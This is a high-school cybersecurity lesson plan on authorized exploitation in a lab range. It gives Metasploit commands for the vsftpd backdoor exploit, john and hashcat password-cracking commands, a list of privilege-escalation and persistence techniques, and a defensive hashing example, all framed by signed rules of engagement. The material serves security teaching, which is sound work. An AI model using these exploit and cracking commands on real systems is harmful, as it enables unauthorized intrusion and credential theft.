Blackbox Intelligence Group

Cybersecurity II · Module 6

Cybersecurity II, Unit 6: Ethical Exploitation Concepts

Where the ethics meet the keyboard. Authorized exploitation in the lab range only: Metasploit basics, password attacks against teacher-issued hash sets, post-exploitation concepts, and the discipline of stopping at proof-of-concept.

Length: 360 min
Level: advanced
Track: Cyber II
Cadence: Semester 2

Unit 6: Ethical Exploitation Concepts

Lesson at a glance

| Item | Detail |
| --- | --- |
| Suggested length | 6 × 60 minutes |
| Recommended placement | Weeks 8–9 of Cyber II |
| Prerequisite | Units 1–5; signed advanced RoE on file |
| Materials | Kali, Metasploitable2, john/hashcat, teacher-issued hash sets, screen recorder for write-ups |

Safety: This unit's labs run only in the host-only lab range, only against teacher-prepared targets, only under signed RoE.

Forbidden anywhere on or off school property: running these tools or techniques against any system you do not own and do not have written authorization to test. Doing so violates the CFAA and the Va. Computer Crimes Act, and ends your career before it starts.

Teacher reads this aloud at the start of every class in this unit.

Standards & credential alignment

  • OffSec PEN-100 + intro PWK concepts.
  • EHE: ethical hacking framework, system hacking concepts.
  • VA CTE Advanced Cyber: penetration testing fundamentals.

Learning objectives

By the end of this unit, students can:

  1. Articulate the legal and ethical framework around exploitation.
  2. Use Metasploit to execute a known exploit against an authorized lab target.
  3. Stop at proof-of-concept; document evidence; never escalate beyond scope.
  4. Crack a teacher-issued hash set with john / hashcat and explain what the result means.
  5. Recognize post-exploitation phases (privilege escalation, persistence, lateral movement) at a conceptual + demo level.
  6. Produce a clean, factual write-up of one authorized exploitation chain.

Vocabulary

  • Exploit - Code or technique that takes advantage of a vulnerability.
  • Payload - Code that runs after the exploit succeeds.
  • Shell - Command-line access on the target.
  • Reverse shell vs. bind shell - Target connects out vs. attacker connects in.
  • Post-exploitation - Activity after initial foothold (privesc, persistence, pivoting).
  • Proof-of-concept (PoC) - Minimum demonstration that the vulnerability is real.
  • Hash - Fingerprint of a password (MD5, SHA-1, NTLM, bcrypt, etc.).
  • Salt - Random data added to a password before hashing.

Pacing

| Day | Focus | Deliverable |
| --- | --- | --- |
| 1 | Ethics + the line + RoE | Signed acknowledgement of unit-specific rules |
| 2 | Metasploit basics + first exploit | Screenshot of authorized PoC |
| 3 | Password hashing + cracking | john output on teacher hash set |
| 4 | Post-exploit concepts (demo only) | Notes on privesc + persistence + lateral |
| 5 | Putting it together | One full authorized chain with screenshots |
| 6 | Write-up | Findings document, 4–8 pages |

Day 1 - Ethics, the line, the rules

Read aloud. Discuss. Sign.

Unit 6 Operating Rules:

  1. I will only run exploitation tools against the targets the teacher has provided in the lab range.
  2. I will not run these tools on home networks, friends' devices, school production systems, or any system not in this lab.
  3. I will stop at proof-of-concept. I will not pivot, exfiltrate real data, or expand scope.
  4. I will document every action with timestamps and screenshots.
  5. If anything unexpected happens, I will stop, snapshot, and call the teacher.
  6. I understand that violating these rules is a federal crime under the CFAA and a state crime under Va. Code § 18.2-152.3.

Day 2 - Metasploit first exploit

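```
# From a Kali shell: initialise the Metasploit database, then start the console
sudo msfdb init
msfconsole

# Inside msfconsole: identify target service from Unit 5 scan
search type:exploit name:vsftpd
use exploit/unix/ftp/vsftpd_234_backdoor
show options
set RHOSTS 192.168.56.20
run
```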

When the shell lands, students:

  1. Run whoami.
  2. Run hostname.
  3. Take a screenshot.
  4. Type exit and stop.

That is the proof of concept. That is the engagement.

Day 3 - Password hashing + cracking

Teacher issues a hash file lab-hashes.txt containing 10 hashes (mix of MD5, SHA-256, NTLM) generated from a known wordlist plus a few weak passwords.

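```
# Identify hash type
hashid 5f4dcc3b5aa765d61d8327deb882cf99

# Crack with john. The file mixes hash types, so select one format per run
# (Raw-MD5 here; repeat with Raw-SHA256 and NT for the other hashes)
john --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt lab-hashes.txt
john --format=Raw-MD5 --show lab-hashes.txt

# Crack with hashcat (GPU if available). -m selects one hash type per run:
# 0 = MD5, 1400 = SHA-256, 1000 = NTLM
hashcat -m 0 -a 0 lab-hashes.txt /usr/share/wordlists/rockyou.txt
```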

Discuss results:

  • Why did MD5 fall in seconds and bcrypt take hours?
  • What does this tell us about password storage choices made by the developer?
  • What's the defensive lesson? (Strong hashing + salt + length + MFA.)
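The defensive side of that discussion, as an added example that is not part of the lesson pack: the same accounts stored as unsalted MD5 and as salted PBKDF2, showing why shared passwords fall together in one store and not the other. Function names, the sample accounts and the iteration count are assumptions made for this example.

```python
import hashlib
import hmac
import os
import time

ITERATIONS = 600_000  # assumed PBKDF2-HMAC-SHA256 work factor; tune to your hardware

def md5_record(password):
    """Unsalted fast hash: the storage scheme that falls to a wordlist."""
    return hashlib.md5(password.encode()).hexdigest()

def kdf_record(password, salt=None):
    """Salted slow hash: fresh 16-byte salt per account, deliberately costly KDF."""
    salt = os.urandom(16) if salt is None else salt
    return salt, hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)

def verify(password, salt, stored):
    """Recompute with the stored salt and compare in constant time."""
    return hmac.compare_digest(kdf_record(password, salt)[1], stored)

def wordlist_hits(md5_db, wordlist):
    """Hash the wordlist once; every account sharing a listed password falls together."""
    table = {md5_record(word): word for word in wordlist}
    return {user: table[h] for user, h in md5_db.items() if h in table}

def cost_ratio(samples=2000):
    """MD5 guesses that fit in the time of one KDF guess on this machine."""
    start = time.perf_counter()
    for i in range(samples):
        md5_record(f"guess{i}")
    per_md5 = (time.perf_counter() - start) / samples
    start = time.perf_counter()
    kdf_record("guess", b"\x00" * 16)
    return (time.perf_counter() - start) / per_md5

if __name__ == "__main__":
    # Constructed sample accounts: alice and bob reuse the same weak password.
    users = {"alice": "password", "bob": "password", "carol": "kettle-orbit-ninety-4"}
    md5_db = {u: md5_record(p) for u, p in users.items()}
    kdf_db = {u: kdf_record(p) for u, p in users.items()}
    print("identical MD5 records:", md5_db["alice"] == md5_db["bob"])
    print("identical KDF records:", kdf_db["alice"][1] == kdf_db["bob"][1])
    print("recovered from MD5 store:", wordlist_hits(md5_db, ["123456", "password"]))
    print(f"one KDF guess costs about {cost_ratio():,.0f} MD5 guesses")
```

The hash passed to hashid in the lab commands is the MD5 record this code produces for the password "password", which is why it is resolved by any wordlist.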

Day 4 - Post-exploitation (concept + demo)

Three categories:

Privilege escalation (privesc):

  • Linux: SUID binaries, sudoers misconfigs, kernel exploits.
  • Windows: unquoted service paths, weak service ACLs, AlwaysInstallElevated.

Persistence:

  • Linux: cron, systemd unit, .bashrc, SSH authorized_keys.
  • Windows: Run keys, scheduled tasks, services.

Lateral movement:

  • Stolen credentials, pass-the-hash, RDP/SSH hops.

Teacher demonstrates one example per category. Students record into engagement notes. No student-driven post-exploitation in this unit - that's PEN-200 territory.

Day 5 - Full chain (authorized)

In teams (operator + recorder), students perform the complete authorized chain on Metasploitable2:

  1. Confirm target authorized (RoE).
  2. Recon + scan (recap from Units 4–5).
  3. Identify a known vulnerable service.
  4. Exploit to PoC shell.
  5. Capture proof (whoami, hostname, screenshot).
  6. Exit.
  7. Snapshot and step away.

Day 6 - Write-up

Template:

```
# Authorized Exploitation Findings - Lab Target 192.168.56.20
## Executive Summary
## Scope + Authorization (RoE attached)
## Methodology
  - Recon, scan, exploit, PoC, exit
## Finding 1
  - Title
  - CVSS v3.1
  - Description
  - Evidence (with timestamps)
  - Reproduction steps
  - Impact
  - Recommended remediation
  - References
## Conclusion + Defensive recommendations
## Appendix: tool output, engagement notes
```

Common misconceptions

  • "If I get a shell, I should explore." - In a real engagement, shell = stop, document, get authorization for next phase.
  • "Cracking a friend's password is a prank." - It is a federal crime. Same statute as cracking a Fortune 500's.
  • "Metasploit is hacking." - Metasploit is a framework. Hacking is methodology, documentation, ethics, and judgment. The framework is just one tool in the kit.

Assessment

  • Day 1 signed acknowledgement on file.
  • Day 2 + 5 PoC screenshots.
  • Day 3 john output + reflection paragraph.
  • Day 6 write-up - rubric scored, weight equivalent to a unit test.

Career connection

Junior pen testers: $70K–$110K. Senior offensive security engineers: $130K–$200K. Bug bounty professionals: open-ended. The career exists because authorized exploitation is a service that companies pay for.

Homework

Read OffSec's PWK syllabus excerpt provided. Identify three topics from PEN-200 you'd want to study next.
